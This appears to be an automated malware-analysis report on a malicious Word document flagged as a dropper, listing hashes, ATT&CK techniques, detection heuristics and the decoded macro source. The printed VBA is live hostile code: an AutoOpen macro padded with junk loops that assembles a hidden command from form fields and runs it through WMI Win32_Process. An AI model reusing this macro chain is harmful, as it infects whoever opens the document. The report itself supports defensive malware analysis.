Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e54e3244fd282e24…

MALICIOUS

Office (OLE)

139.1 KB Created: 2019-05-08 17:36:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 7c48919dc8b0d047989dfe3dd45476ab SHA-1: 088bf473ff412947dfc287b3a219bcfa58e67a31 SHA-256: e54e3244fd282e2498df9cd1a6e23981bd858cd178665263b6eeff3edb6cba82
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes GetObject and CreateObject to launch a WMI process, indicating an attempt to execute arbitrary commands or download further payloads. The ClamAV detection 'Doc.Dropper.Agent-6965774-0' further supports its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6965774-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6965774-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6850 bytes
SHA-256: cb10093ac6f0739d22565c71f619174ba982a01e43294f7cf8cd03d45a4c336f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "u266359_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "o527_216"
Attribute VB_Base = "0{E89BDF6C-CDF9-44B3-BD78-6D56238EDB36}{FC61C88D-9A4A-4EF7-8F47-76F8210231CE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "v82049"

Attribute VB_Name = "d8260569"

Attribute VB_Name = "X_03_27"

Attribute VB_Name = "A4590489"

Attribute VB_Name = "S9473908"
Attribute VB_Base = "0{63AF6905-F3A3-438D-AF8E-870DC54746BD}{AA920780-647F-4A27-A65D-137B92DB7800}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "N25165"
Function E723134(K1071967)
         While U12808__ And O20757
'f527_070o731565M1112848z9380149
'P11_52O853203_C07282d_4_2972
'w28_76O87450k_6250i2647881
      Wend
         While k043491 And z14204
'G76403M74__42S097236U0103233
'd298481Z27_9665A4_1193T38887_
'M6_1299w3588388E902288V_401_26
      Wend
Set E723134 = CVar(K1071967)
         While U34068 And I7_31652
'm513901A8_211_z178083n2__6779
'J55973M60314X9164_Q95135
's_1363L6_4_71S29888W699810
      Wend
         While Z9656_95 And i69512
'a0571812P656120X62755K4801345
'v895542o25762_R3_36_w9342198
'V12965j9839241X83067s1818_
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While z4527138 And S13571
'V870228r6622618V994915A476963
'C23674H03739z885009z54_87
'q7_4_250a0196219E435258M53585
      Wend
         While k9161891 And q7865_
'u463631l__8477r3378_82p6745235
'R952312a_2062O77742A27671
'L71925C0708823z980183_b2959070
      Wend
Call k566251
         While U8_273 And s992217
'L84922_1X600_0O5662_m020_59
's3537124C1_93114l649741L190227
'l55322_6u90177w783_30O3977347
      Wend
         While S775548 And P57178_2
'h4828_08w4116549W0830964Q377348
'Y68259_4J531659L_57__6Y0299073
'M605_872E35843w82__3W5745371
      Wend
         While u19558 And Y3880_46
'z104656Z447930s3763760z_993002
'b508477u511677t307189Y2802744
'w281435w4381441Q30_011_X832405
      Wend
End Sub


Attribute VB_Name = "U830644"
Function k566251()
On Error Resume Next
         While L385225 And Q5076977
'q5661119j516643i64_61k13732
'F8884148t45126O366160n60543
'h7_0728I00809s8577306J007207
      Wend
         While j987061 And O391_773
'I4979_z734759L6_62062E360102
't2_761V_74339U8_63696V93566
'j4065152F01964w788222f3620742
      Wend
         While J965_593 And Y_823_8
'b39991V25203T22561W46_3_7
'Q185_85T27678s0718682Y906668
'z95581Y2_80931U77_473X071915
      Wend
E166256 = o527_216.c232_28.ControlTipText + S9473908.A9_04_3 + o527_216.c232_28.ControlSource + S9473908.o454584 + o527_216.c232_28.PasswordChar + o527_216.c232_28.PasswordChar + S9473908.C_17318_ + o527_216.c232_28.ControlTipText + o527_216.c232_28 + S9473908.G_838386 + o527_216.c232_28 + S9473908.N674__ + o527_216.c232_28.ControlSource
         While u__197 And f37805
'n2121_f96_706h1316_38Q6532487
'E3_346_b9900351J06835d47_46
'V1181120d8719354j789335d53719
      Wend
         While G60_5_ And J37048
't3170600C98773_3M055_425h463_09
'i8_76_d84_141u88745N9358950
'H330660z77_670_l445832t00128
      Wend
Set j589625 = E723134(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
         While X65_58 And I3_2702
'z_4839O1018475C615955T867438
'Y5396128Z_58832b30403p569_4
'Z54__419f1_943_7j257_043a889309
      Wend
         While p13_2469 And M167920
'q77976l9426988c2411_4q727336
'N48557K69390R6_9675w17210
'V62928z905319v9609804d202701
      Wend
j589625.Create v39456 + E166256 + z904_32, V794583,
... (truncated)